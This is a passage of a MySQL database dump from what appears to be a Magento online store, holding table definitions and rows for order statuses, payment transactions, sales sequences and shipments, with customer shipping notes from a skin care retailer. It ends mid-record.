-- Table structure for table `sales_order_status_state`
--

CREATE TABLE `sales_order_status_state` (
  `status` varchar(32) NOT NULL COMMENT 'Status',
  `state` varchar(32) NOT NULL COMMENT 'Label',
  `is_default` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Is Default',
  `visible_on_front` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Visible on front'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Order Status Table';

--
-- Dumping data for table `sales_order_status_state`
--

INSERT INTO `sales_order_status_state` VALUES ('canceled','canceled',1,1),('closed','closed',1,1),('complete','complete',1,1),('fraud','payment_review',0,1),('fraud','processing',0,1),('holded','holded',1,1),('payment_review','payment_review',1,1),('pending','new',1,1),('pending_payment','pending_payment',1,0),('processing','processing',1,1);

--
-- Table structure for table `sales_order_tax`
--

CREATE TABLE `sales_order_tax` (
  `tax_id` int unsigned NOT NULL COMMENT 'Tax ID',
  `order_id` int unsigned NOT NULL COMMENT 'Order ID',
  `code` varchar(255) DEFAULT NULL COMMENT 'Code',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title',
  `percent` decimal(12,4) DEFAULT NULL COMMENT 'Percent',
  `amount` decimal(20,4) DEFAULT NULL COMMENT 'Amount',
  `priority` int NOT NULL COMMENT 'Priority',
  `position` int NOT NULL COMMENT 'Position',
  `base_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount',
  `process` smallint NOT NULL COMMENT 'Process',
  `base_real_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Real Amount'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Order Tax Table';

--
-- Dumping data for table `sales_order_tax`
--


--
-- Table structure for table `sales_order_tax_item`
--

CREATE TABLE `sales_order_tax_item` (
  `tax_item_id` int unsigned NOT NULL COMMENT 'Tax Item ID',
  `tax_id` int unsigned NOT NULL COMMENT 'Tax ID',
  `item_id` int unsigned DEFAULT NULL COMMENT 'Item ID',
  `tax_percent` decimal(12,4) NOT NULL COMMENT 'Real Tax Percent For Item',
  `amount` decimal(20,4) NOT NULL COMMENT 'Tax amount for the item and tax rate',
  `base_amount` decimal(20,4) NOT NULL COMMENT 'Base tax amount for the item and tax rate',
  `real_amount` decimal(20,4) NOT NULL COMMENT 'Real tax amount for the item and tax rate',
  `real_base_amount` decimal(20,4) NOT NULL COMMENT 'Real base tax amount for the item and tax rate',
  `associated_item_id` int unsigned DEFAULT NULL COMMENT 'Id of the associated item',
  `taxable_item_type` varchar(32) NOT NULL COMMENT 'Type of the taxable item'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Order Tax Item';

--
-- Dumping data for table `sales_order_tax_item`
--


--
-- Table structure for table `sales_payment_transaction`
--

CREATE TABLE `sales_payment_transaction` (
  `transaction_id` int unsigned NOT NULL COMMENT 'Transaction ID',
  `parent_id` int unsigned DEFAULT NULL COMMENT 'Parent ID',
  `order_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'Order ID',
  `payment_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'Payment ID',
  `txn_id` varchar(100) DEFAULT NULL COMMENT 'Txn ID',
  `parent_txn_id` varchar(100) DEFAULT NULL COMMENT 'Parent Txn ID',
  `txn_type` varchar(15) DEFAULT NULL COMMENT 'Txn Type',
  `is_closed` smallint unsigned NOT NULL DEFAULT '1' COMMENT 'Is Closed',
  `additional_information` blob COMMENT 'Additional Information',
  `created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT 'Created At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Payment Transaction';

--
-- Dumping data for table `sales_payment_transaction`
--

INSERT INTO `sales_payment_transaction` VALUES (2,NULL,4,4,'1V2900192L044572L',NULL,'authorization',0,_binary 'null','2020-10-20 07:30:55'),(3,NULL,5,5,'8RX54210JB302210B',NULL,'authorization',0,_binary 'null','2020-10-23 02:37:17'),(7,NULL,8,8,'wKcx4Uqwc8WKqeErpchCoxjeV',NULL,'authorization',0,_binary 'null','2020-12-07 19:25:45'),(20,NULL,24,24,'5VM5145965942013T',NULL,'capture',0,_binary 'null','2021-02-11 00:36:12'),(25,NULL,29,29,'3DH75924RH240734B',NULL,'capture',0,_binary 'null','2021-02-14 03:18:08'),(26,NULL,30,30,'2NS86476K4978041C',NULL,'capture',0,_binary 'null','2021-03-02 17:50:30'),(27,NULL,31,31,'8S426895J94489600',NULL,'capture',0,_binary 'null','2021-03-16 21:33:26'),(28,NULL,32,32,'2XM90865KA3751318',NULL,'capture',0,_binary 'null','2021-03-17 21:23:47'),(29,NULL,33,33,'78K49490AG140632P',NULL,'capture',0,_binary 'null','2021-03-20 13:51:34'),(30,NULL,34,34,'6V006225KT636745A',NULL,'capture',0,_binary 'null','2021-03-23 02:56:35'),(31,NULL,35,35,'7C623211MJ570884H',NULL,'capture',0,_binary 'null','2021-03-29 21:47:36'),(32,NULL,36,36,'1XC50433F71339918',NULL,'capture',0,_binary 'null','2021-03-31 22:00:55'),(33,NULL,37,37,'7FG56839EW9220608',NULL,'capture',0,_binary 'null','2021-04-02 01:21:15'),(34,NULL,38,38,'7AC11569DJ486390N',NULL,'capture',0,_binary 'null','2021-04-03 11:34:44'),(35,NULL,39,39,'3MV69762FE692763F',NULL,'capture',0,_binary 'null','2021-04-05 20:18:24'),(36,NULL,40,40,'0BX63400T04656632',NULL,'capture',0,_binary 'null','2021-04-14 23:37:24'),(37,NULL,41,41,'5VH72529CD483643M',NULL,'capture',0,_binary 'null','2021-04-16 06:27:21'),(38,NULL,42,42,'59012920MV707083E',NULL,'capture',0,_binary 'null','2021-04-19 02:57:57'),(39,NULL,43,43,'3AU849636C464423B',NULL,'capture',0,_binary 'null','2021-04-21 04:16:13'),(40,NULL,44,44,'3Y6020989X8420425',NULL,'capture',0,_binary 'null','2021-05-12 02:36:04'),(46,NULL,50,50,'irW0wMJmtLenSQnEMeJ1jozeV',NULL,'capture',1,_binary 'null','2021-06-03 00:04:34'),(47,NULL,51,51,'5L751896VW985830F',NULL,'capture',0,_binary 'null','2021-06-04 21:53:56'),(48,NULL,52,52,'4EC65582TT3645302',NULL,'capture',0,_binary 'null','2021-06-14 04:29:23'),(49,NULL,54,54,'4HL786277P5874949',NULL,'capture',0,_binary 'null','2021-08-21 16:13:08'),(50,NULL,55,55,'E0UH9s8ydwk8w6nRGPC6KfieV',NULL,'capture',1,_binary 'null','2021-08-26 13:25:25'),(51,NULL,56,56,'4cZ0OliNih1Vd4NuvGOeEGjeV',NULL,'capture',1,_binary 'null','2021-09-01 13:27:30'),(52,NULL,57,57,'46W87022EW994313C',NULL,'capture',0,_binary 'null','2021-09-01 17:36:50'),(53,NULL,58,58,'4BM51270TD3299034',NULL,'capture',0,_binary 'null','2021-09-02 22:16:21'),(54,NULL,59,59,'4KD50838A3702970R',NULL,'capture',0,_binary 'null','2021-09-08 09:53:57'),(55,NULL,60,60,'3S712059RJ246091V',NULL,'capture',0,_binary 'null','2021-09-10 12:18:31'),(56,NULL,61,61,'3UU90694B1635720S',NULL,'capture',0,_binary 'null','2021-09-13 01:18:05'),(57,NULL,62,62,'Ek6sSZD61jUk1GHyeBB9f1feV',NULL,'capture',1,_binary 'null','2021-09-13 22:09:52'),(58,NULL,63,63,'AUNZyVdsRT1e6cqGI2BAD4geV',NULL,'capture',1,_binary 'null','2021-09-14 01:24:46'),(59,NULL,64,64,'3CB268008N889500B',NULL,'capture',0,_binary 'null','2021-09-26 19:38:38'),(60,NULL,65,65,'1V799870BE635210B',NULL,'capture',0,_binary 'null','2021-10-11 23:49:25'),(61,NULL,66,66,'70R50062HF199483N',NULL,'capture',0,_binary 'null','2021-10-16 23:00:20'),(62,NULL,67,67,'56H409628Y846204B',NULL,'capture',0,_binary 'null','2021-11-12 15:05:31'),(63,NULL,68,68,'04L6028762503345M',NULL,'capture',0,_binary 'null','2021-11-19 04:58:33'),(64,NULL,69,69,'92H25523A4865664B',NULL,'capture',0,_binary 'null','2021-12-06 02:37:05'),(65,NULL,70,70,'mRIaLE5MvNmMJqXESvvo9uoeV',NULL,'capture',1,_binary 'null','2022-01-04 16:52:54'),(66,NULL,71,71,'8Mg2vRhwGeRh5QVS1HXVBYheV',NULL,'capture',1,_binary 'null','2022-01-06 16:28:34'),(67,NULL,72,72,'3PG62970F7767273G',NULL,'capture',0,_binary 'null','2022-01-09 06:54:39'),(68,NULL,73,73,'1LA70198LL026454G',NULL,'capture',0,_binary 'null','2022-01-11 04:20:50'),(69,NULL,74,74,'aHqw1WANOAScEUdcAqbBBo4eV',NULL,'capture',1,_binary 'null','2022-01-15 16:17:48'),(70,NULL,75,75,'13H53156LL609044S',NULL,'capture',0,_binary 'null','2022-02-15 16:49:27'),(71,NULL,76,76,'14546677V3206444V',NULL,'capture',0,_binary 'null','2022-02-18 16:13:50'),(72,NULL,77,77,'07X1238172434010K',NULL,'capture',0,_binary 'null','2022-02-22 00:59:20'),(73,NULL,78,78,'9GW08222SM8173712',NULL,'capture',0,_binary 'null','2022-02-24 02:05:12'),(74,NULL,79,79,'4C512658BX4311325',NULL,'capture',0,_binary 'null','2022-02-24 17:15:00'),(75,NULL,80,80,'7U960391C53697239',NULL,'capture',0,_binary 'null','2022-03-05 00:04:02'),(76,NULL,81,81,'9Y60196828335234B',NULL,'capture',0,_binary 'null','2022-03-05 13:54:21'),(77,NULL,82,82,'23nOvz300TjpcCqCtDwfA0keV',NULL,'capture',1,_binary 'null','2022-03-10 00:29:07'),(78,NULL,83,83,'305196794L257741J',NULL,'capture',0,_binary 'null','2022-03-11 13:44:25'),(79,NULL,84,84,'7JM79456W4013460T',NULL,'capture',0,_binary 'null','2022-03-14 10:30:01'),(80,NULL,85,85,'QycvayWCdTzepl1Nah0jb1oeV',NULL,'capture',1,_binary 'null','2022-03-14 23:57:22'),(81,NULL,86,86,'eVuREJCuSRKJGo4vA78HYG3eV',NULL,'capture',1,_binary 'null','2022-03-17 01:09:48'),(82,NULL,87,87,'g6iodQV5Rh3tBzdwI7WJeqAfV',NULL,'capture',1,_binary 'null','2022-03-21 14:45:20'),(83,NULL,88,88,'4Cqt92AaKsCWNHwpCDdSCSneV',NULL,'capture',1,_binary 'null','2022-03-21 18:26:28'),(84,NULL,89,89,'4C612090NA608271K',NULL,'capture',0,_binary 'null','2022-03-30 09:13:18'),(85,NULL,90,90,'0JV35951E83493429',NULL,'capture',0,_binary 'null','2022-04-10 19:41:48'),(86,NULL,91,91,'6HD93746WN643182C',NULL,'capture',0,_binary 'null','2022-04-11 13:08:05'),(87,NULL,92,92,'5UK46897MW055463J',NULL,'capture',0,_binary 'null','2022-05-26 11:11:02'),(88,NULL,93,93,'yPQaYmUu5l3r4c04wwq1xI1eV',NULL,'capture',1,_binary 'null','2022-07-03 03:41:46'),(89,NULL,94,94,'Ya6bRqPWRyMt2kFKfZjBSg9eV',NULL,'capture',1,_binary 'null','2022-07-08 13:20:49'),(90,NULL,95,95,'YIuBrnIDPbvBNCy00Kw5RSjeV',NULL,'capture',1,_binary 'null','2022-07-21 19:04:13'),(91,NULL,96,96,'83N73162249539523',NULL,'capture',0,_binary 'null','2022-08-01 03:12:04'),(92,NULL,97,97,'1B944281WY402541F',NULL,'capture',0,_binary 'null','2022-08-02 02:17:39'),(93,NULL,98,98,'0U888371NF479434S',NULL,'capture',0,_binary 'null','2022-08-10 15:25:27'),(94,NULL,99,99,'4Y6513815C797903A',NULL,'capture',0,_binary 'null','2022-08-13 16:51:08'),(95,NULL,100,100,'8TT20337XA2415156',NULL,'capture',0,_binary 'null','2022-08-15 15:52:15'),(96,NULL,101,101,'2NL56306713611932',NULL,'capture',0,_binary 'null','2022-08-31 09:18:49'),(97,NULL,102,102,'98X20155A3830702L',NULL,'capture',0,_binary 'null','2022-09-09 01:02:52'),(98,NULL,103,103,'0CP193990R244215A',NULL,'capture',0,_binary 'null','2022-10-12 17:03:14'),(99,NULL,104,104,'MU9mmiTjtaHYA80fwk0KeZneV',NULL,'capture',1,_binary 'null','2022-10-26 23:24:27'),(100,NULL,105,105,'6D49983250953053G',NULL,'capture',0,_binary 'null','2022-10-27 19:13:38'),(101,NULL,106,106,'0F649059LK891093B',NULL,'capture',0,_binary 'null','2022-11-18 19:49:02'),(102,NULL,107,107,'2BW18230JK685672K',NULL,'capture',0,_binary 'null','2022-11-30 22:19:47'),(103,NULL,108,108,'0PC16641UD044523B',NULL,'capture',0,_binary 'null','2022-12-17 19:47:33'),(104,NULL,109,109,'1MM74405BK530451U',NULL,'capture',0,_binary 'null','2022-12-26 18:18:34'),(105,NULL,110,110,'25069224YC3730936',NULL,'capture',0,_binary 'null','2022-12-28 01:49:46'),(106,NULL,111,111,'4VJ12280LN090450R',NULL,'capture',0,_binary 'null','2022-12-28 22:22:00'),(107,NULL,112,112,'12236978W1875291A',NULL,'capture',0,_binary 'null','2023-01-04 15:27:49'),(108,NULL,113,113,'5VR72533LU440630X',NULL,'capture',0,_binary 'null','2023-02-14 16:28:04'),(109,NULL,114,114,'3TW46941GX399560L',NULL,'capture',0,_binary 'null','2023-02-17 23:49:03'),(110,NULL,115,115,'33832687T0409845U',NULL,'capture',0,_binary 'null','2023-02-22 12:50:55'),(111,NULL,116,116,'2GW225915G923191E',NULL,'capture',0,_binary 'null','2023-03-03 02:11:20'),(112,NULL,117,117,'3P5434294G2220512',NULL,'capture',0,_binary 'null','2023-03-12 00:52:38'),(113,NULL,118,118,'4WV03180VE552800J',NULL,'capture',0,_binary 'null','2023-03-31 07:12:18'),(114,NULL,119,119,'pi_2MszH9QpdyOMwvHL0lRZJLHu',NULL,'capture',0,_binary 'null','2023-04-04 02:07:15'),(115,NULL,120,120,'pi_2MtBUbQpdyOMwvHL12VphSc3',NULL,'capture',0,_binary '{\"amount\":14.99,\"currency\":\"usd\"}','2023-04-04 15:11:14'),(116,NULL,121,121,'69825718R9214352V',NULL,'capture',0,_binary 'null','2024-04-10 01:49:06');

--
-- Table structure for table `sales_refunded_aggregated`
--

CREATE TABLE `sales_refunded_aggregated` (
  `id` int unsigned NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) NOT NULL COMMENT 'Order Status',
  `orders_count` int NOT NULL DEFAULT '0' COMMENT 'Orders Count',
  `refunded` decimal(20,4) DEFAULT NULL COMMENT 'Refunded',
  `online_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Online Refunded',
  `offline_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Offline Refunded'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Refunded Aggregated';

--
-- Dumping data for table `sales_refunded_aggregated`
--


--
-- Table structure for table `sales_refunded_aggregated_order`
--

CREATE TABLE `sales_refunded_aggregated_order` (
  `id` int unsigned NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `orders_count` int NOT NULL DEFAULT '0' COMMENT 'Orders Count',
  `refunded` decimal(20,4) DEFAULT NULL COMMENT 'Refunded',
  `online_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Online Refunded',
  `offline_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Offline Refunded'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Refunded Aggregated Order';

--
-- Dumping data for table `sales_refunded_aggregated_order`
--


--
-- Table structure for table `sales_sequence_meta`
--

CREATE TABLE `sales_sequence_meta` (
  `meta_id` int unsigned NOT NULL COMMENT 'ID',
  `entity_type` varchar(32) NOT NULL COMMENT 'Prefix',
  `store_id` smallint unsigned NOT NULL COMMENT 'Store ID',
  `sequence_table` varchar(64) NOT NULL COMMENT 'table for sequence'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='sales_sequence_meta';

--
-- Dumping data for table `sales_sequence_meta`
--

INSERT INTO `sales_sequence_meta` VALUES (1,'order',0,'sequence_order_0'),(2,'invoice',0,'sequence_invoice_0'),(3,'creditmemo',0,'sequence_creditmemo_0'),(4,'shipment',0,'sequence_shipment_0'),(5,'order',1,'sequence_order_1'),(6,'invoice',1,'sequence_invoice_1'),(7,'creditmemo',1,'sequence_creditmemo_1'),(8,'shipment',1,'sequence_shipment_1'),(9,'order',2,'sequence_order_2'),(10,'invoice',2,'sequence_invoice_2'),(11,'creditmemo',2,'sequence_creditmemo_2'),(12,'shipment',2,'sequence_shipment_2'),(13,'order',3,'sequence_order_3'),(14,'invoice',3,'sequence_invoice_3'),(15,'creditmemo',3,'sequence_creditmemo_3'),(16,'shipment',3,'sequence_shipment_3'),(17,'order',4,'sequence_order_4'),(18,'invoice',4,'sequence_invoice_4'),(19,'creditmemo',4,'sequence_creditmemo_4'),(20,'shipment',4,'sequence_shipment_4');

--
-- Table structure for table `sales_sequence_profile`
--

CREATE TABLE `sales_sequence_profile` (
  `profile_id` int unsigned NOT NULL COMMENT 'ID',
  `meta_id` int unsigned NOT NULL COMMENT 'Meta_id',
  `prefix` varchar(32) DEFAULT NULL COMMENT 'Prefix',
  `suffix` varchar(32) DEFAULT NULL COMMENT 'Suffix',
  `start_value` int unsigned NOT NULL DEFAULT '1' COMMENT 'Start value for sequence',
  `step` int unsigned NOT NULL DEFAULT '1' COMMENT 'Step for sequence',
  `max_value` int unsigned NOT NULL COMMENT 'MaxValue for sequence',
  `warning_value` int unsigned NOT NULL COMMENT 'WarningValue for sequence',
  `is_active` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'isActive flag'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='sales_sequence_profile';

--
-- Dumping data for table `sales_sequence_profile`
--

INSERT INTO `sales_sequence_profile` VALUES (1,1,NULL,NULL,1,1,4294967295,4294966295,1),(2,2,NULL,NULL,1,1,4294967295,4294966295,1),(3,3,NULL,NULL,1,1,4294967295,4294966295,1),(4,4,NULL,NULL,1,1,4294967295,4294966295,1),(5,5,'V-',NULL,1,1,4294967295,4294966295,1),(6,6,'V-',NULL,1,1,4294967295,4294966295,1),(7,7,'V-',NULL,1,1,4294967295,4294966295,1),(8,8,'V-',NULL,1,1,4294967295,4294966295,1),(9,9,'MF-',NULL,1,1,4294967295,4294966295,1),(10,10,'MF-',NULL,1,1,4294967295,4294966295,1),(11,11,'MF-',NULL,1,1,4294967295,4294966295,1),(12,12,'MF-',NULL,1,1,4294967295,4294966295,1),(13,13,'IT-',NULL,1,1,4294967295,4294966295,1),(14,14,'IT-',NULL,1,1,4294967295,4294966295,1),(15,15,'IT-',NULL,1,1,4294967295,4294966295,1),(16,16,'IT-',NULL,1,1,4294967295,4294966295,1),(17,17,'4',NULL,1,1,4294967295,4294966295,1),(18,18,'4',NULL,1,1,4294967295,4294966295,1),(19,19,'4',NULL,1,1,4294967295,4294966295,1),(20,20,'4',NULL,1,1,4294967295,4294966295,1);

--
-- Table structure for table `sales_shipment`
--

CREATE TABLE `sales_shipment` (
  `entity_id` int unsigned NOT NULL COMMENT 'Entity ID',
  `store_id` smallint unsigned DEFAULT NULL COMMENT 'Store ID',
  `total_weight` decimal(12,4) DEFAULT NULL COMMENT 'Total Weight',
  `total_qty` decimal(12,4) DEFAULT NULL COMMENT 'Total Qty',
  `email_sent` smallint unsigned DEFAULT NULL COMMENT 'Email Sent',
  `send_email` smallint unsigned DEFAULT NULL COMMENT 'Send Email',
  `order_id` int unsigned NOT NULL COMMENT 'Order ID',
  `customer_id` int DEFAULT NULL COMMENT 'Customer ID',
  `shipping_address_id` int DEFAULT NULL COMMENT 'Shipping Address ID',
  `billing_address_id` int DEFAULT NULL COMMENT 'Billing Address ID',
  `shipment_status` int DEFAULT NULL COMMENT 'Shipment Status',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'Updated At',
  `packages` text COMMENT 'Packed Products in Packages',
  `shipping_label` mediumblob COMMENT 'Shipping Label Content',
  `customer_note` text COMMENT 'Customer Note',
  `customer_note_notify` smallint unsigned DEFAULT NULL COMMENT 'Customer Note Notify'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Flat Shipment';

--
-- Dumping data for table `sales_shipment`
--

INSERT INTO `sales_shipment` VALUES (4,1,NULL,1.0000,1,1,8,NULL,15,16,NULL,'000000004','2020-12-10 19:02:40','2020-12-10 19:02:50','[]',NULL,NULL,NULL),(5,1,NULL,1.0000,NULL,NULL,5,NULL,9,10,NULL,'000000005','2020-12-16 15:59:44','2020-12-16 15:59:44','[]',NULL,NULL,NULL),(8,3,NULL,1.0000,1,1,24,NULL,47,48,NULL,'IT-00001','2021-02-15 13:06:27','2021-02-15 13:06:47','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care. Attached, is your receipt.  Please visit ImperialTouch.com and sign up for our newsletter to receive exclusive offers.  Your UPS tracking number is 1Z6X6W600316182239.\r\n\r\nKeep In Touch:\r\n800-504-8606 \r\ntwitter.com/imperialtouch \r\nfacebook.com/imperialtouch1 \r\ninstagram.com/imperialtouch1',1),(9,3,NULL,1.0000,1,1,29,NULL,57,58,NULL,'IT-00002','2021-02-15 13:15:23','2021-02-15 13:15:31','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care. Attached, is your receipt.  Please visit ImperialTouch.com and sign up for our newsletter to receive exclusive offers.  Your UPS tracking number is 1Z6X6W600307398649.\r\n\r\nKeep In Touch:\r\n800-504-8606 \r\ntwitter.com/imperialtouch \r\nfacebook.com/imperialtouch1 \r\ninstagram.com/imperialtouch1',1),(10,3,NULL,3.0000,1,1,30,NULL,59,60,NULL,'IT-00003','2021-03-04 12:57:28','2021-03-04 12:57:43','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care. Attached, is your shipping receipt via UPS.  1Z6X6W600304221067.  Please visit ImperialTouch.com and sign up for our newsletter to receive exclusive offers.  \r\n\r\nKeep In Touch: \r\ntwitter.com/imperialtouch \r\nfacebook.com/imperialtouch1 \r\ninstagram.com/imperialtouch1',1),(11,3,NULL,2.0000,1,1,33,NULL,65,66,NULL,'IT-00004','2021-03-22 11:43:22','2021-03-22 11:43:36','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care. Attached, is your receipt.  Please visit ImperialTouch.com and sign up for our newsletter to receive exclusive offers.  Your UPS tracking number is 1Z6X6W600303395079.\r\n\r\nKeep In Touch:\r\n800-504-8606 \r\ntwitter.com/imperialtouch \r\nfacebook.com/imperialtouch1 \r\ninstagram.com/imperialtouch1',1),(12,3,NULL,1.0000,1,1,32,NULL,63,64,NULL,'IT-00005','2021-03-23 10:12:50','2021-03-23 10:13:08','[]',NULL,NULL,NULL),(13,3,NULL,5.0000,1,1,34,NULL,67,68,NULL,'IT-00006','2021-03-25 10:03:21','2021-03-25 10:03:39','[]',NULL,NULL,NULL),(14,3,NULL,1.0000,1,1,36,NULL,71,72,NULL,'IT-00007','2021-04-19 12:30:20','2021-04-19 12:30:41','[]',NULL,NULL,NULL),(15,3,NULL,2.0000,1,1,35,NULL,69,70,NULL,'IT-00008','2021-04-19 23:27:37','2021-04-19 23:27:50','[]',NULL,NULL,NULL),(16,3,NULL,4.0000,1,1,38,NULL,75,76,NULL,'IT-00009','2021-04-19 23:32:22','2021-04-19 23:32:32','[]',NULL,NULL,NULL),(17,3,NULL,1.0000,1,1,39,NULL,77,78,NULL,'IT-00010','2021-04-19 23:38:31','2021-04-19 23:38:39','[]',NULL,NULL,NULL),(18,3,NULL,1.0000,1,1,40,NULL,79,80,NULL,'IT-00011','2021-04-19 23:43:01','2021-04-19 23:43:08','[]',NULL,NULL,NULL),(19,3,NULL,1.0000,1,1,41,NULL,81,82,NULL,'IT-00012','2021-04-19 23:47:31','2021-04-19 23:47:39','[]',NULL,NULL,NULL),(20,3,NULL,3.0000,1,1,42,NULL,83,84,NULL,'IT-00013','2021-04-19 23:53:01','2021-04-19 23:53:09','[]',NULL,NULL,NULL),(21,3,NULL,1.0000,1,1,37,NULL,73,74,NULL,'IT-00014','2021-04-23 08:57:32','2021-04-23 08:57:52','[]',NULL,NULL,NULL),(22,3,NULL,3.0000,1,1,43,96,85,86,NULL,'IT-00015','2021-04-23 20:53:03','2021-04-23 20:53:21','[]',NULL,NULL,NULL),(23,3,NULL,1.0000,1,1,44,NULL,87,88,NULL,'IT-00016','2021-05-18 09:49:11','2021-05-18 09:49:33','[]',NULL,NULL,NULL),(24,3,NULL,1.0000,1,1,50,97,99,100,NULL,'IT-00017','2021-06-03 19:31:15','2021-06-03 19:31:28','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your package has shipped.',1),(25,3,NULL,1.0000,1,1,51,NULL,101,102,NULL,'IT-00018','2021-06-06 03:59:39','2021-06-06 03:59:54','[]',NULL,NULL,NULL),(26,3,NULL,6.0000,1,1,52,NULL,103,104,NULL,'IT-00019','2021-06-14 12:32:34','2021-06-14 12:32:40','[]',NULL,NULL,NULL),(27,3,NULL,1.0000,1,1,53,99,105,106,NULL,'IT-00020','2021-07-10 07:05:47','2021-07-10 07:05:57','[]',NULL,'Thank you for shopping at Imperial Touch',1),(28,3,NULL,1.0000,1,1,55,NULL,109,110,NULL,'IT-00021','2021-08-27 17:17:30','2021-08-27 17:17:44','[]',NULL,'1Z6X6W600315107278',1),(29,3,NULL,3.0000,1,1,54,NULL,107,108,NULL,'IT-00022','2021-08-27 22:18:32','2021-08-27 22:18:43','[]',NULL,'1Z6X6W600312352482',1),(30,3,NULL,2.0000,1,1,56,NULL,111,112,NULL,'IT-00023','2021-09-07 11:58:03','2021-09-07 11:58:13','[]',NULL,NULL,NULL),(31,3,NULL,1.0000,NULL,NULL,57,NULL,113,114,NULL,'IT-00024','2021-09-11 00:19:33','2021-09-11 00:19:33','[]',NULL,NULL,NULL),(32,3,NULL,1.0000,1,1,60,NULL,119,120,NULL,'IT-00025','2021-09-13 12:54:45','2021-09-13 12:54:55','[]',NULL,NULL,NULL),(33,3,NULL,2.0000,NULL,NULL,58,NULL,115,116,NULL,'IT-00026','2021-10-07 12:41:40','2021-10-07 12:41:40','[]',NULL,NULL,NULL),(34,3,NULL,1.0000,NULL,1,65,NULL,129,130,NULL,'IT-00027','2021-10-13 15:39:48','2021-10-13 15:39:56','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Attached, is your tracking number.  1Z6X6W600308086555.',1),(35,3,NULL,1.0000,NULL,1,64,NULL,127,128,NULL,'IT-00028','2021-10-13 15:47:37','2021-10-13 15:47:38','[]',NULL,NULL,NULL),(36,3,NULL,1.0000,NULL,1,63,NULL,125,126,NULL,'IT-00029','2021-10-13 15:53:37','2021-10-13 15:53:38','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Attached, is your tracking number. 1Z6X6W600331419302',1),(37,3,NULL,1.0000,NULL,1,62,NULL,123,124,NULL,'IT-00030','2021-10-13 15:59:56','2021-10-13 15:59:57','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  The Pandemic has caused delay a little longer then expected, however, we appreciate your business.  We have provided you with a gift for the delay.  Attached, is your tracking number.  1Z6X6W600339805719',1),(38,3,NULL,1.0000,NULL,1,61,NULL,121,122,NULL,'IT-00031','2021-10-13 16:06:05','2021-10-13 16:06:13','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Attached, is your tracking number.  1Z6X6W600308043378',1),(39,3,NULL,1.0000,NULL,NULL,59,NULL,117,118,NULL,'IT-00032','2021-10-13 16:06:59','2021-10-13 16:06:59','[]',NULL,NULL,NULL),(40,3,NULL,1.0000,NULL,1,66,NULL,131,132,NULL,'IT-00033','2021-10-19 12:14:21','2021-10-19 12:14:29','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your package is on the way.  Here is the UPS tracking number.',1),(41,3,NULL,1.0000,1,1,67,NULL,133,134,NULL,'IT-00034','2021-11-18 22:03:48','2021-11-18 22:03:54','[]',NULL,NULL,NULL),(42,3,NULL,1.0000,1,1,68,NULL,135,136,NULL,'IT-00035','2021-11-20 13:34:54','2021-11-20 13:35:10','[]',NULL,'Your order has been shipped.  The UPS tracking number is 1Z6X6W600320870148.',1),(43,3,NULL,1.0000,1,1,69,NULL,137,138,NULL,'IT-00036','2021-12-09 18:53:15','2021-12-09 18:53:24','[]',NULL,NULL,NULL),(44,3,NULL,2.0000,1,1,70,NULL,139,140,NULL,'IT-00037','2022-01-07 15:05:00','2022-01-07 15:05:17','[]',NULL,'Thank you for shopping Imperial Touch Skin Care.  Your order has been shipped.',0),(45,3,NULL,1.0000,1,1,71,NULL,141,142,NULL,'IT-00038','2022-01-07 15:06:40','2022-01-07 15:06:41','[]',NULL,'Thank you for shopping at Imperial Touch Skin Care.  Your order has been shipped.',1),(46,3,NULL,1.0000,1,1,73,NULL,145,146,NULL,'IT-00039','2022-01-13 21:10:28','2022-01-13 21:10:36','[]',NULL,'Thank you for shopping at Imperial Touch.  Your order has shipped.',1),(47,3,NULL,1.0000,NULL,NULL,72,NULL,143,144,NULL,'IT-00040','2022-01-14 16:56:09','2022-01-14 16:56:09','[]',NULL,NULL,NULL),(48,3,NULL,1.0000,1,1,74,NULL,147,148,NULL,'IT-00041','2022-01-19 06:35:08','2022-01-19 06:35:23','[]',NULL,'Thank you for shopping at Imperial Touch.  Your order has shipped via US Postal 